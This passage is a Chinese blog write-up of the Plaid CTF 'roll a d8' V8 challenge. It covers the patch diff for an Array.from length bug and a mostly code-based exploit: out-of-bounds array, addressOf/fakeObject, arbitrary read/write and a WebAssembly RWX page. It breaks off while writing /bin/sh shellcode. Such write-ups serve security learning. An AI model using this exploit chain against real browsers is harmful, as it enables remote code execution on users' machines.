<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>浏览器漏洞学习--V8--Plaid CTF roll a d8 | 白里个白</title>
  <meta name="author" content="SofrWhite">
  
  <meta name="description" content="前言继续学习浏览器漏洞的相关知识，加油！！！下周争取把angr的东西总结一下，搞搞课题吧つ﹏⊂。如果有有缘的人读到这篇文章，而且恰好你研究的方向是AEG相关，可以带带我这个菜鸡吗/(ㄒoㄒ)/~~。邮箱：sofr@foxmail.com
之前文章：
v8开坑+starCTF2019 oob
数字经济final-browser
关键字： CTF pwn browser v8 Plaid CTF roll a d8">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="浏览器漏洞学习--V8--Plaid CTF roll a d8"/>
  <meta property="og:site_name" content="白里个白"/>

  
    <meta property="og:image" content=""/>
  

  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  


<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "//hm.baidu.com/hm.js?70c14b3774d11227a872a4e3d91d46e9";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>


<meta name="generator" content="Hexo 4.2.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">白里个白</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class=""></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class=""></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class=""></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class=""></i>About
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> 浏览器漏洞学习--V8--Plaid CTF roll a d8</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  		

	  <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>继续学习浏览器漏洞的相关知识，加油！！！下周争取把angr的东西总结一下，搞搞课题吧つ﹏⊂。如果有有缘的人读到这篇文章，而且恰好你研究的方向是AEG相关，可以带带我这个菜鸡吗/(ㄒoㄒ)/~~。邮箱：<a href="mailto:sofr@foxmail.com">sofr@foxmail.com</a></p>
<p>之前文章：</p>
<p><a href="http://pwn.sofr.website/2020/06/01/v8开坑/" target="_blank" rel="noopener">v8开坑+starCTF2019 oob</a></p>
<p><a href="http://pwn.sofr.website/2020/06/06/数字经济/" target="_blank" rel="noopener">数字经济final-browser</a></p>
<p>关键字： <code>CTF</code> <code>pwn</code> <code>browser</code> <code>v8</code> <code>Plaid CTF roll a d8</code></p>
<a id="more"></a>

<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">git reset --hard 1dab065bb4025bdd663ba12e2e976c34c3fa6599</span><br><span class="line">gclient sync</span><br><span class="line">tools/dev/v8gen.py x64.debug </span><br><span class="line">ninja -C out.gn/x64.debug d8</span><br></pre></td></tr></table></figure>

<h2 id="题目信息"><a href="#题目信息" class="headerlink" title="题目信息"></a>题目信息</h2><p>这次这个题目就是给了poc写exp，也是一个真实的漏洞。可以看下官网，也有提。<a href="https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d^!/" target="_blank" rel="noopener">更新后版本</a></p>
<p>所以应该兴奋一点啊，搓搓手，这可是真正的realword。开森！！！</p>
<p>和之前的题目一样，先看diff，官网给出的diff是这样的：</p>
<figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line">diff --git a/src/builtins/builtins-array-gen.cc b/src/builtins/builtins-array-gen.cc</span><br><span class="line">index dcf3be4..3a74342 100644</span><br><span class="line"><span class="comment">--- a/src/builtins/builtins-array-gen.cc</span></span><br><span class="line"><span class="comment">+++ b/src/builtins/builtins-array-gen.cc</span></span><br><span class="line"><span class="meta">@@ -1945,10 +1945,13 @@</span></span><br><span class="line">   void GenerateSetLength(TNode&lt;Context&gt; context, TNode&lt;Object&gt; array,</span><br><span class="line">                          TNode&lt;Number&gt; length) &#123;</span><br><span class="line">     Label fast(this), runtime(this), done(this);</span><br><span class="line"><span class="addition">+    // TODO(delphick): We should be able to skip the fast set altogether, if the</span></span><br><span class="line"><span class="addition">+    // length already equals the expected length, which it always is now on the</span></span><br><span class="line"><span class="addition">+    // fast path.</span></span><br><span class="line">     // Only set the length in this stub if</span><br><span class="line">     // 1) the array has fast elements,</span><br><span class="line">     // 2) the length is writable,</span><br><span class="line"><span class="deletion">-    // 3) the new length is greater than or equal to the old length.</span></span><br><span class="line"><span class="addition">+    // 3) the new length is equal to the old length.</span></span><br><span class="line"> </span><br><span class="line">     // 1) Check that the array has fast elements.</span><br><span class="line">     // TODO(delphick): Consider changing this since it does an an unnecessary</span><br><span class="line"><span class="meta">@@ -1970,10 +1973,10 @@</span></span><br><span class="line">       // BranchIfFastJSArray above.</span><br><span class="line">       EnsureArrayLengthWritable(LoadMap(fast_array), &amp;runtime);</span><br><span class="line"> </span><br><span class="line"><span class="deletion">-      // 3) If the created array already has a length greater than required,</span></span><br><span class="line"><span class="addition">+      // 3) If the created array's length does not match the required length,</span></span><br><span class="line">       //    then use the runtime to set the property as that will insert holes</span><br><span class="line"><span class="deletion">-      //    into the excess elements and/or shrink the backing store.</span></span><br><span class="line"><span class="deletion">-      GotoIf(SmiLessThan(length_smi, old_length), &amp;runtime);</span></span><br><span class="line"><span class="addition">+      //    into excess elements or shrink the backing store as appropriate.</span></span><br><span class="line"><span class="addition">+      GotoIf(SmiNotEqual(length_smi, old_length), &amp;runtime);</span></span><br><span class="line"> </span><br><span class="line">       StoreObjectFieldNoWriteBarrier(fast_array, JSArray::kLengthOffset,</span><br><span class="line">                                      length_smi);</span><br><span class="line">diff --git a/test/mjsunit/regress/regress-821137.js b/test/mjsunit/regress/regress-821137.js</span><br><span class="line">new file mode 100644</span><br><span class="line">index 0000000..639b3b9</span><br><span class="line"><span class="comment">--- /dev/null</span></span><br><span class="line"><span class="comment">+++ b/test/mjsunit/regress/regress-821137.js</span></span><br><span class="line"><span class="meta">@@ -0,0 +1,27 @@</span></span><br><span class="line"><span class="addition">+// Copyright 2018 the V8 project authors. All rights reserved.</span></span><br><span class="line"><span class="addition">+// Use of this source code is governed by a BSD-style license that can be</span></span><br><span class="line"><span class="addition">+// found in the LICENSE file.</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+// Tests that creating an iterator that shrinks the array populated by</span></span><br><span class="line"><span class="addition">+// Array.from does not lead to out of bounds writes.</span></span><br><span class="line"><span class="addition">+let oobArray = [];</span></span><br><span class="line"><span class="addition">+let maxSize = 1028 * 8;</span></span><br><span class="line"><span class="addition">+Array.from.call(function() &#123; return oobArray &#125;, &#123;[Symbol.iterator] : _ =&gt; (</span></span><br><span class="line"><span class="addition">+  &#123;</span></span><br><span class="line"><span class="addition">+    counter : 0,</span></span><br><span class="line"><span class="addition">+    next() &#123;</span></span><br><span class="line"><span class="addition">+      let result = this.counter++;</span></span><br><span class="line"><span class="addition">+      if (this.counter &gt; maxSize) &#123;</span></span><br><span class="line"><span class="addition">+        oobArray.length = 0;</span></span><br><span class="line"><span class="addition">+        return &#123;done: true&#125;;</span></span><br><span class="line"><span class="addition">+      &#125; else &#123;</span></span><br><span class="line"><span class="addition">+        return &#123;value: result, done: false&#125;;</span></span><br><span class="line"><span class="addition">+      &#125;</span></span><br><span class="line"><span class="addition">+    &#125;</span></span><br><span class="line"><span class="addition">+  &#125;</span></span><br><span class="line"><span class="addition">+) &#125;);</span></span><br><span class="line"><span class="addition">+assertEquals(oobArray.length, maxSize);</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+// iterator reset the length to 0 just before returning done, so this will crash</span></span><br><span class="line"><span class="addition">+// if the backing store was not resized correctly.</span></span><br><span class="line"><span class="addition">+oobArray[oobArray.length - 1] = 0x41414141;</span></span><br></pre></td></tr></table></figure>

<p>后面还附带了poc，很贴心。其实这个漏洞的细节，我还是有一点不太懂，但是有了这个poc，可以说难度降低了很多。</p>
<p>首先还是看下漏洞是如何来的</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">GenerateSetLength</span><span class="params">(TNode&lt;Context&gt; context, TNode&lt;Object&gt; <span class="built_in">array</span>, TNode&lt;Number&gt; length)</span> </span>&#123;</span><br><span class="line">  Label fast(this), runtime(this), done(this);</span><br><span class="line">  BranchIfFastJSArray(<span class="built_in">array</span>, context, &amp;fast, &amp;runtime);</span><br><span class="line"></span><br><span class="line">  BIND(&amp;fast);</span><br><span class="line">  &#123;</span><br><span class="line">    TNode&lt;JSArray&gt; fast_array = CAST(<span class="built_in">array</span>);</span><br><span class="line">    TNode&lt;Smi&gt; length_smi = CAST(length);</span><br><span class="line">    TNode&lt;Smi&gt; old_length = LoadFastJSArrayLength(fast_array);</span><br><span class="line">    CSA_ASSERT(<span class="keyword">this</span>, TaggedIsPositiveSmi(old_length));</span><br><span class="line">    EnsureArrayLengthWritable(LoadMap(fast_array), &amp;runtime);</span><br><span class="line">    GotoIf(SmiLessThan(length_smi, old_length), &amp;runtime);</span><br><span class="line">    StoreObjectFieldNoWriteBarrier(fast_array, JSArray::kLengthOffset, length_smi);</span><br><span class="line">    Goto(&amp;done);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  BIND(&amp;runtime);</span><br><span class="line">  &#123;</span><br><span class="line">    CallRuntime(Runtime::kSetProperty, context, <span class="keyword">static_cast</span>&lt;Node*&gt;(<span class="built_in">array</span>), CodeStubAssembler::LengthStringConstant(), length, SmiConstant(LanguageMode::kStrict));</span><br><span class="line">    Goto(&amp;done);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  BIND(&amp;done);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里面我们可以看到如果length_smi大于等于old_length，那么久会将fast_array的length赋值为length_smi。理一下上下文的逻辑，就是在迭代的时候，将每次迭代的结果存进数组，同时将数组的长度扩大。如果此时length_smi小于old_length则不会改变数组的长度。</p>
<p>但是如果在迭代的最后一轮，我们将数组的大小缩小，此时length_smi会随着迭代次数增长，但是，old_length被改小，此时数组的大小会被改大，但是没有做内存扩大的操作。所以，就造成了oob。在一顿gc后，完全可以做到溢出至其他数组。</p>
<p>调试poc后发现果然如此，数组的大小是0x2020但是FixedArray中长度却是0</p>
<h2 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h2><p>其实在搞清楚这个思路后，我们的思路可以和数字经济的exp很像，都是数组越界，这里只不过是多一个gc的过程，使得目标数组重新分配。</p>
<p>先构造数组越界：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> oobArray = [<span class="number">1.1</span>];</span><br><span class="line"><span class="keyword">var</span> c = [<span class="number">1.1</span>];</span><br><span class="line"><span class="keyword">var</span> b = [c];</span><br><span class="line"><span class="keyword">let</span> maxSize = <span class="number">1028</span> * <span class="number">8</span>;</span><br><span class="line"></span><br><span class="line"><span class="built_in">Array</span>.from.call(<span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123; <span class="keyword">return</span> oobArray &#125;, &#123;[<span class="built_in">Symbol</span>.iterator] : <span class="function"><span class="params">_</span> =&gt;</span> (</span><br><span class="line">        &#123;</span><br><span class="line">                counter : <span class="number">0</span>,</span><br><span class="line">                next() &#123;</span><br><span class="line">                        <span class="keyword">let</span> result = <span class="keyword">this</span>.counter++;</span><br><span class="line">                        <span class="keyword">if</span> (<span class="keyword">this</span>.counter &gt; maxSize) &#123;</span><br><span class="line">                                oobArray.length = <span class="number">1</span>;</span><br><span class="line">                                <span class="keyword">let</span> a = [<span class="number">1.1</span>];</span><br><span class="line">                                <span class="keyword">let</span> obj = [a];</span><br><span class="line">                                b.push(a);</span><br><span class="line">                                b.push(obj);</span><br><span class="line">                                <span class="keyword">return</span> &#123;<span class="attr">done</span>: <span class="literal">true</span>&#125;;</span><br><span class="line">                        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                                <span class="keyword">return</span> &#123;<span class="attr">value</span>: result, <span class="attr">done</span>: <span class="literal">false</span>&#125;;</span><br><span class="line">                        &#125;</span><br><span class="line">                &#125;</span><br><span class="line">        &#125;</span><br><span class="line">) &#125;);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">gc</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">        <span class="keyword">for</span>(<span class="keyword">let</span> i=<span class="number">0</span>;i&lt;<span class="number">0x10</span>;i++)</span><br><span class="line">        &#123;</span><br><span class="line">                <span class="keyword">new</span> <span class="built_in">Array</span>(<span class="number">0x1000000</span>);</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">gc();</span><br></pre></td></tr></table></figure>

<p>此时，oobArray和B数组中的float数组和object数组就很近了。这时候构建任意对象读和任意对象构造：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">oobArray[<span class="number">7</span>] = <span class="number">0x1</span>;<span class="comment">//使得float数组的长度很大，浮点值中1很大的，(*^_^*)</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">addressOf</span>(<span class="params">object</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">                b[<span class="number">2</span>][<span class="number">0</span>] = object;</span><br><span class="line">                <span class="keyword">return</span> f2i(b[<span class="number">1</span>][<span class="number">10</span>])<span class="number">-1</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">fakeObject</span>(<span class="params">address</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">                b[<span class="number">1</span>][<span class="number">10</span>] = i2f(address);</span><br><span class="line">                <span class="keyword">var</span> fakeObject = b[<span class="number">2</span>][<span class="number">0</span>];</span><br><span class="line">                <span class="keyword">return</span> fakeObject;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>之后也是很常规，造一个任意地址读写：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> float_map = oobArray[<span class="number">4</span>];</span><br><span class="line"><span class="keyword">var</span> evil_array = [float_map,<span class="number">0.0</span>,i2f(<span class="number">0x11</span>),i2f(<span class="number">0x400000000</span>)]</span><br><span class="line"><span class="keyword">var</span> leak_addr = addressOf(evil_array);</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"[+] leak obj addr: "</span> + hex(leak_addr));</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> fake_obj_addr = leak_addr+<span class="number">0xa0</span>;</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"[+] obj addr: "</span> + hex(fake_obj_addr));</span><br><span class="line"><span class="keyword">var</span> fake_obj = fakeObject(fake_obj_addr+<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">read64</span>(<span class="params">addr</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">                        evil_array[<span class="number">2</span>] = i2f(addr<span class="number">-0x10</span>+<span class="number">1</span>);</span><br><span class="line">                        <span class="keyword">var</span> leak_data = f2i(fake_obj[<span class="number">0</span>]);</span><br><span class="line">                        <span class="keyword">return</span> leak_data;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">write64</span>(<span class="params">addr,data</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">                        evil_array[<span class="number">2</span>] = i2f(addr<span class="number">-0x10</span>+<span class="number">1</span>);</span><br><span class="line">                        fake_obj[<span class="number">0</span>] = i2f(data);</span><br><span class="line">                        <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> data_buf = <span class="keyword">new</span> <span class="built_in">ArrayBuffer</span>(<span class="number">0x200</span>);</span><br><span class="line"><span class="keyword">var</span> data_view = <span class="keyword">new</span> <span class="built_in">DataView</span>(data_buf);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">dataview_write</span>(<span class="params">addr,data</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">                write64(addressOf(data_buf)+<span class="number">0x20</span>,addr);</span><br><span class="line">                data_view.setFloat64(<span class="number">0</span>,i2f(data),<span class="literal">true</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">dataview_write</span>(<span class="params">addr, payload</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">            write64(addressOf(data_buf)+<span class="number">0x20</span>,addr);</span><br><span class="line">            <span class="keyword">for</span>(<span class="keyword">let</span> i=<span class="number">0</span>; i&lt;payload.length; i++) &#123;</span><br><span class="line">                                data_view.setUint8(i, payload[i]);</span><br><span class="line">                            &#125;</span><br><span class="line">            <span class="keyword">return</span> ;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>最后在触发getshell的时候，我们不用free_hook了，改用wasm，学习一下。</p>
<p>wasm简单来说就是构建了一个可读可写可执行的内存区域，然后放shellcode，也就很自然了</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">wasm_func</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">	<span class="keyword">var</span> wasmImports = &#123;</span><br><span class="line">		env: &#123;</span><br><span class="line">			puts: <span class="function"><span class="keyword">function</span> <span class="title">puts</span> (<span class="params">index</span>) </span>&#123;</span><br><span class="line">				print(utf8ToString(h, index));</span><br><span class="line">             &#125;</span><br><span class="line">         &#125;</span><br><span class="line">    &#125;;</span><br><span class="line">    <span class="keyword">var</span> buffer = <span class="keyword">new</span> <span class="built_in">Uint8Array</span>([<span class="number">0</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">109</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">137</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">2</span>,</span><br><span class="line">                 <span class="number">96</span>,<span class="number">1</span>,<span class="number">127</span>,<span class="number">1</span>,<span class="number">127</span>,<span class="number">96</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">140</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">3</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">118</span>,<span class="number">4</span>,<span class="number">112</span>,<span class="number">117</span>,</span><br><span class="line">                 <span class="number">116</span>,<span class="number">115</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">3</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">1</span>,<span class="number">4</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">112</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">5</span>,</span><br><span class="line">                 <span class="number">131</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">6</span>,<span class="number">129</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">7</span>,<span class="number">146</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">6</span>,</span><br><span class="line">                 <span class="number">109</span>,<span class="number">101</span>,<span class="number">109</span>,<span class="number">111</span>,<span class="number">114</span>,<span class="number">121</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">5</span>,<span class="number">104</span>,<span class="number">101</span>,<span class="number">108</span>,<span class="number">108</span>,<span class="number">111</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">10</span>,<span class="number">141</span>,<span class="number">128</span>,<span class="number">128</span>,</span><br><span class="line">                 <span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">135</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">65</span>,<span class="number">16</span>,<span class="number">16</span>,<span class="number">0</span>,<span class="number">26</span>,<span class="number">11</span>,<span class="number">11</span>,<span class="number">146</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,</span><br><span class="line">                 <span class="number">65</span>,<span class="number">16</span>,<span class="number">11</span>,<span class="number">12</span>,<span class="number">72</span>,<span class="number">101</span>,<span class="number">108</span>,<span class="number">108</span>,<span class="number">111</span>,<span class="number">32</span>,<span class="number">87</span>,<span class="number">111</span>,<span class="number">114</span>,<span class="number">108</span>,<span class="number">100</span>,<span class="number">0</span>]);</span><br><span class="line">    <span class="keyword">let</span> m = <span class="keyword">new</span> WebAssembly.Instance(<span class="keyword">new</span> WebAssembly.Module(buffer),wasmImports);</span><br><span class="line">    <span class="keyword">let</span> h = <span class="keyword">new</span> <span class="built_in">Uint8Array</span>(m.exports.memory.buffer);</span><br><span class="line">    <span class="keyword">return</span> m.exports.hello;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">func = wasm_func();</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> wasm_obj_addr = addressOf(func);</span><br><span class="line"><span class="keyword">var</span> shared_info_addr = read64(wasm_obj_addr+<span class="number">0x18</span>)<span class="number">-1</span>;</span><br><span class="line"><span class="keyword">var</span> code_addr = read64(shared_info_addr+<span class="number">8</span>)<span class="number">-1</span>;</span><br><span class="line"><span class="keyword">var</span> rwx_addr = (read64(code_addr+<span class="number">0x72</span>));</span><br><span class="line"></span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"wasm obj addr: 0x"</span>+hex(wasm_obj_addr));</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"wasm shared info addr: 0x"</span>+hex(shared_info_addr));</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"wasm code addr: 0x"</span>+hex(code_addr));</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"rwx addr: 0x"</span>+hex(rwx_addr));</span><br></pre></td></tr></table></figure>

<p>最后向这个内存写入shellcode：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> shellcode = [<span class="number">106</span>, <span class="number">104</span>, <span class="number">72</span>, <span class="number">184</span>, <span class="number">47</span>, <span class="number">98</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">47</span>, <span class="number">47</span>, <span class="number">47</span>, <span class="number">115</span>, <span class="number">80</span>, <span class="number">72</span>, <span class="number">137</span>, <span class="number">231</span>, <span class="number">104</span>, <span class="number">114</span>, <span class="number">105</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">129</span>, <span class="number">52</span>, <span class="number">36</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">49</span>, <span class="number">246</span>, <span class="number">86</span>, 